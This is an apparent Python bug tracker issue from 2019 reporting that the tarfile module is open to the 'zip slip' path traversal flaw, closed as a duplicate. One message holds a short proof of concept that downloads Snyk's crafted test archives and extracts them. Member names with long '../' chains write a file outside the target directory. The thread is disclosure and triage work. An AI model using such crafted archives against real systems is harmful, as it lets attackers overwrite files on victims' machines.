Created on 2019-02-06 09:37 by uhei3nn9, last changed 2019-02-06 10:36 by christian.heimes. This issue is now closed.
| Messages (6) | |||
|---|---|---|---|
| msg334910 - (view) | Author: uhei3nn9 (uhei3nn9) | Date: 2019-02-06 09:37 | |
As has been discovered in 06.2018 the python library is affected by the zip slip vulbnerability (meaning code execution) The affected section https://github.com/python/cpython/blob/3.7/Lib/tarfile.py has not been patched since then. Therefore it seems python has not yet fixed this vulnerability. Source: https://github.com/snyk/zip-slip-vulnerability |
|||
| msg334911 - (view) | Author: Sihoon Lee (push0ebp) * | Date: 2019-02-06 09:47 | |
When I had tested it before, It was not worked. Was it really worked? Could you show me your PoC Code? |
|||
| msg334914 - (view) | Author: Jeff Knupp (jeffknupp) * | Date: 2019-02-06 10:05 | |
According to https://snyk.io/research/zip-slip-vulnerability (the source of the paper), Python hasn't been vulnerable since 2014. |
|||
| msg334918 - (view) | Author: SilentGhost (SilentGhost) *  |
Date: 2019-02-06 10:14 | |
issue 21109 was mentioned as an example of reported behaviour in https://github.com/snyk/zip-slip-vulnerability/issues/4#issuecomment-395848367 |
|||
| msg334920 - (view) | Author: Christian Heimes (christian.heimes) *  |
Date: 2019-02-06 10:32 | |
You are both right and wrong. The zipfile module of Python 3.7 is fine, but the tarfile module is still vulnerable. $ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.zip $ curl -O https://raw.githubusercontent.com/snyk/zip-slip-vulnerability/master/archives/zip-slip.tar $ mkdir /tmp/zipslip $ cd /tmp/zipslip Test zipfile: $ python3 >>> import zipfile >>> zf = zipfile.ZipFile('zip-slip.zip') >>> zf.printdir() File Name Modified Size good.txt 2018-04-15 22:04:30 19 ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt 2018-04-15 22:04:42 20 >>> zf.extractall() >>> exit() $ find . ./tmp ./tmp/evil.txt ./good.txt ./zip-slip.tar ./zip-slip.zip Test tarfile $ rm -rf good.txt tmp/ $ python3 >>> import tarfile >>> import tarfile >>> tf = tarfile.TarFile('zip-slip.tar') >>> tf.list() ?rw-r--r-- grander/staff 19 2018-04-15 19:04:29 good.txt ?rw-r--r-- grander/staff 20 2018-06-03 13:49:05 ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt >>> tf.extractall() # find . ./zip-slip.tar ./good.txt ./zip-slip.zip # cat /tmp/evil.txt this is an evil one |
|||
| msg334922 - (view) | Author: Christian Heimes (christian.heimes) * |
Date: 2019-02-06 10:36 | |
Thanks for reporting the issue. I'm closing this issue as duplicate of #21109. Let's keep all discussion on one issue. |
|||
| History | |||
|---|---|---|---|
| Date | User | Action | Args |
| 2019-02-06 10:36:07 | christian.heimes | set | status: open -> closed superseder: tarfile: Traversal attack vulnerability messages: + msg334922 resolution: duplicate stage: resolved |
| 2019-02-06 10:32:47 | christian.heimes | set | messages: + msg334920 |
| 2019-02-06 10:14:22 | SilentGhost | set | nosy:
+ SilentGhost messages: + msg334918 |
| 2019-02-06 10:05:28 | jeffknupp | set | nosy:
+ jeffknupp messages: + msg334914 |
| 2019-02-06 09:58:33 | rhettinger | set | assignee: christian.heimes nosy: + christian.heimes |
| 2019-02-06 09:47:21 | push0ebp | set | nosy:
+ push0ebp, - lars.gustaebel messages: + msg334911 |
| 2019-02-06 09:45:08 | SilentGhost | set | keywords:
+ security_issue nosy: + lars.gustaebel |
| 2019-02-06 09:37:04 | uhei3nn9 | create | |